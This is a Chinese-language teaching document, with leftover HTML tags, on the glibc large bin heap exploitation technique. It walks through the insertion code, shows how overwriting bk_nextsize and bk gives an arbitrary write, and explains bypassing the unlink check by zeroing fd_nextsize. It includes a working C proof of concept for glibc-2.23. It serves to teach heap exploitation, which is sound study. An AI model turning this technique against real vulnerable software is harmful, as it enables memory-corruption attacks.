Large Bin 漏洞分析与利用教学文档<\/h1>

一、漏洞背景与基础知识<\/h2>

1.1 malloc_chunk 结构<\/h3>
struct<\/span> malloc_chunk {
<\/span><\/span>    INTERNAL_SIZE_T prev_size;    \/* 前一个chunk的大小(如果前一个chunk是空闲的) *\/<\/span>
<\/span><\/span>    INTERNAL_SIZE_T size;         \/* 包含开销的字节大小 *\/<\/span>
<\/span><\/span>    struct<\/span> malloc_chunk*<\/span> fd;      \/* 双向链接 - 仅在空闲时使用 *\/<\/span>
<\/span><\/span>    struct<\/span> malloc_chunk*<\/span> bk;      \/* 双向链接 - 仅在空闲时使用 *\/<\/span>
<\/span><\/span>    
<\/span><\/span>    \/* 仅用于large blocks: 指向下一个更大尺寸的指针 *\/<\/span>
<\/span><\/span>    struct<\/span> malloc_chunk*<\/span> fd_nextsize; 
<\/span><\/span>    struct<\/span> malloc_chunk*<\/span> bk_nextsize;
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>关键字段说明：<\/p>

fd_nextsize<\/code> 和 bk_nextsize<\/code>：仅用于较大的chunk(large chunk)

fd_nextsize<\/code>：指向前一个与当前chunk大小不同的第一个空闲块(不包含bin的头指针)<\/li>
bk_nextsize<\/code>：指向后一个与当前chunk大小不同的第一个空闲块(不包含bin的头指针)<\/li>
<\/ul>
<\/li>
空闲的large chunk在fd遍历顺序中按由大到小的顺序排列<\/li>
<\/ul>
1.2 Large Bin 管理机制<\/h3>

ptmalloc使用bins管理空闲chunk<\/li>
main_arena中有多个bin<\/li>
每个large bin存放一定范围内的chunk<\/li>
其中的chunk按fd指针顺序从大到小排列<\/li>
相同大小的chunk按最近使用顺序排列<\/li>
物理地址相邻的两个chunk不能在一起<\/li>
<\/ul>
二、漏洞原理分析<\/h2>
2.1 Large Bin 插入过程<\/h3>
当分配一个chunk时，会首先检查unsort bin，如果没有合适的chunk，就将unsort bin中的chunk脱链后加入到对应大小的bin中。<\/p>
关键代码分析：<\/p>
\/\/ 如果不是small bin，就放到large bin中
<\/span><\/span><\/span><\/span>if<\/span> (!<\/span>in_smallbin_range(size)) {
<\/span><\/span>    victim_index =<\/span> largebin_index(size);
<\/span><\/span>    bck =<\/span> bin_at(av, victim_index);
<\/span><\/span>    fwd =<\/span> bck-><\/span>fd;
<\/span><\/span>    
<\/span><\/span>    \/* maintain large bins in sorted order *\/<\/span>
<\/span><\/span>    if<\/span> (fwd !=<\/span> bck) {
<\/span><\/span>        size |=<\/span> PREV_INUSE;
<\/span><\/span>        if<\/span> ((unsigned<\/span> long<\/span>)(size) <<\/span> (unsigned<\/span> long<\/span>)(bck-><\/span>bk-><\/span>size)) {
<\/span><\/span>            \/\/ 处理比最小chunk还小的情况
<\/span><\/span><\/span><\/span>            fwd =<\/span> bck;
<\/span><\/span>            bck =<\/span> bck-><\/span>bk;
<\/span><\/span>            victim-><\/span>fd_nextsize =<\/span> fwd-><\/span>fd;
<\/span><\/span>            victim-><\/span>bk_nextsize =<\/span> fwd-><\/span>fd-><\/span>bk_nextsize;
<\/span><\/span>            fwd-><\/span>fd-><\/span>bk_nextsize =<\/span> victim-><\/span>bk_nextsize-><\/span>fd_nextsize =<\/span> victim;
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            \/\/ 正常插入逻辑
<\/span><\/span><\/span><\/span>            while<\/span> ((unsigned<\/span> long<\/span>)size <<\/span> fwd-><\/span>size) {
<\/span><\/span>                fwd =<\/span> fwd-><\/span>fd_nextsize;
<\/span><\/span>            }
<\/span><\/span>            if<\/span> ((unsigned<\/span> long<\/span>)size ==<\/span> (unsigned<\/span> long<\/span>)fwd-><\/span>size) {
<\/span><\/span>                \/\/ 相同大小插入到第二个位置
<\/span><\/span><\/span><\/span>                fwd =<\/span> fwd-><\/span>fd;
<\/span><\/span>            } else<\/span> {
<\/span><\/span>                \/\/ 不同大小插入
<\/span><\/span><\/span><\/span>                victim-><\/span>fd_nextsize =<\/span> fwd;
<\/span><\/span>                victim-><\/span>bk_nextsize =<\/span> fwd-><\/span>bk_nextsize;
<\/span><\/span>                fwd-><\/span>bk_nextsize =<\/span> victim;
<\/span><\/span>                victim-><\/span>bk_nextsize-><\/span>fd_nextsize =<\/span> victim;
<\/span><\/span>            }
<\/span><\/span>            bck =<\/span> fwd-><\/span>bk;
<\/span><\/span>        }
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        victim-><\/span>fd_nextsize =<\/span> victim-><\/span>bk_nextsize =<\/span> victim;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    mark_bin(av, victim_index);
<\/span><\/span>    victim-><\/span>bk =<\/span> bck;
<\/span><\/span>    victim-><\/span>fd =<\/span> fwd;
<\/span><\/span>    fwd-><\/span>bk =<\/span> victim;
<\/span><\/span>    bck-><\/span>fd =<\/span> victim;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 漏洞触发点<\/h3>
关键操作：<\/p>

victim->bk_nextsize = fwd->bk_nextsize;<\/code><\/li>
fwd->bk_nextsize = victim;<\/code><\/li>
victim->bk_nextsize->fd_nextsize = victim;<\/code><\/li>
<\/ol>
合并效果：<\/p>

fwd->bk_nextsize->fd_nextsize = victim<\/code><\/li>
fwd->bk = victim<\/code><\/li>
<\/ul>
当large bin中只存在一个chunk时，通过堆溢出修改bk_nextsize<\/code>和bk<\/code>字段，可以实现任意地址写。<\/p>
三、漏洞利用方法<\/h2>
3.1 错误实例分析<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    long<\/span> long<\/span> x =<\/span> 0<\/span>;
<\/span><\/span>    char<\/span> *<\/span>p, *<\/span>q, *<\/span>r, *<\/span>s;
<\/span><\/span>    
<\/span><\/span>    p =<\/span> malloc(0x500<\/span>); \/\/ 防止合并
<\/span><\/span><\/span><\/span>    malloc(0<\/span>);
<\/span><\/span>    q =<\/span> malloc(0x510<\/span>); \/\/ 防止合并
<\/span><\/span><\/span><\/span>    malloc(0<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 因为Large bin的遍历顺序是FIFO，所以下面的顺序不能反过来
<\/span><\/span><\/span><\/span>    free(p);
<\/span><\/span>    free(q); \/\/ p指向的chunk被放入了largebin
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    r =<\/span> malloc(0x510<\/span>); \/\/ q
<\/span><\/span><\/span><\/span>    \/\/ q指向的chunk被放入unsortedbin
<\/span><\/span><\/span><\/span>    free(r);
<\/span><\/span>    
<\/span><\/span>    \/\/ fwd->bk_nextsize->fd_nextsize=victim
<\/span><\/span><\/span><\/span>    *<\/span>(void<\/span>**<\/span>)(p -<\/span> 16<\/span> +<\/span> 40<\/span>) =<\/span> &<\/span>x -<\/span> 4<\/span>;
<\/span><\/span>    
<\/span><\/span>    s =<\/span> malloc(0<\/span>);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>问题：无法通过unlink的双向链表完整性检查：<\/p>
if<\/span> (__builtin_expect(P-><\/span>fd_nextsize-><\/span>bk_nextsize !=<\/span> P, 0<\/span>) 
<\/span><\/span>    ||<\/span> __builtin_expect(P-><\/span>bk_nextsize-><\/span>fd_nextsize !=<\/span> P, 0<\/span>))
<\/span><\/span>    malloc_printerr("corrupted double-linked list (not small)"<\/span>);
<\/span><\/span><\/code><\/pre>3.2 正确绕过方法<\/h3>
在执行双向链表完整性检查前有一个判断：<\/p>
if<\/span> (!<\/span>in_smallbin_range(chunksize_nomask(P)) 
<\/span><\/span>    &&<\/span> __builtin_expect(P-><\/span>fd_nextsize !=<\/span> NULL, 0<\/span>)) {
<\/span><\/span>    \/\/ 检查代码
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>只要构造的chunk的fd_nextsize<\/code>为NULL即可绕过检查。<\/p>
3.3 正确利用实例<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    long<\/span> long<\/span> x =<\/span> 0<\/span>;
<\/span><\/span>    char<\/span> *<\/span>p, *<\/span>q, *<\/span>r, *<\/span>s;
<\/span><\/span>    
<\/span><\/span>    p =<\/span> malloc(0x500<\/span>); \/\/ 防止合并
<\/span><\/span><\/span><\/span>    malloc(0<\/span>);
<\/span><\/span>    q =<\/span> malloc(0x510<\/span>); \/\/ 防止合并
<\/span><\/span><\/span><\/span>    malloc(0<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 因为Large bin的遍历顺序是FIFO，所以下面的顺序不能反过来
<\/span><\/span><\/span><\/span>    free(p);
<\/span><\/span>    free(q); \/\/ p指向的chunk被放入了largebin
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    r =<\/span> malloc(0x510<\/span>); \/\/ q
<\/span><\/span><\/span><\/span>    \/\/ q指向的chunk被放入unsortedbin
<\/span><\/span><\/span><\/span>    free(r);
<\/span><\/span>    
<\/span><\/span>    fprintf(stderr, "x : %lld<\/span>\n<\/span>"<\/span>, x);
<\/span><\/span>    
<\/span><\/span>    \/\/ P->fd_nextsize=NULL
<\/span><\/span><\/span><\/span>    *<\/span>(void<\/span>**<\/span>)(p -<\/span> 16<\/span> +<\/span> 32<\/span>) =<\/span> NULL;
<\/span><\/span>    \/\/ P->bk_nextsize->fd_nextsize=victim
<\/span><\/span><\/span><\/span>    *<\/span>(void<\/span>**<\/span>)(p -<\/span> 16<\/span> +<\/span> 40<\/span>) =<\/span> &<\/span>x -<\/span> 4<\/span>;
<\/span><\/span>    
<\/span><\/span>    s =<\/span> malloc(0<\/span>);
<\/span><\/span>    fprintf(stderr, "x : %lld<\/span>\n<\/span>"<\/span>, x);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>运行结果：<\/p>
x : 0
x : 20276528
<\/code><\/pre>
四、关键点总结<\/h2>

Large Bin结构<\/strong>：理解large bin中chunk的排列方式和fd_nextsize<\/code>\/bk_nextsize<\/code>指针的作用<\/li>
插入逻辑<\/strong>：掌握large bin插入新chunk时的指针操作流程<\/li>
漏洞触发<\/strong>：利用堆溢出修改bk_nextsize<\/code>和bk<\/code>字段实现任意地址写<\/li>
绕过检查<\/strong>：通过设置fd_nextsize<\/code>为NULL来绕过unlink的双向链表完整性检查<\/li>
利用条件<\/strong>：large bin中需要只存在一个chunk时才能有效利用此漏洞<\/li>
<\/ol>
五、实验环境与注意事项<\/h2>

实验环境：glibc-2.23<\/li>
对于glibc-2.26及以上版本，需要先绕过tcache机制<\/li>
分配chunk时要注意防止合并<\/li>
Large bin的遍历顺序是FIFO，操作顺序不能反过来<\/li>
调试是理解堆漏洞的关键手段<\/li>
<\/ol>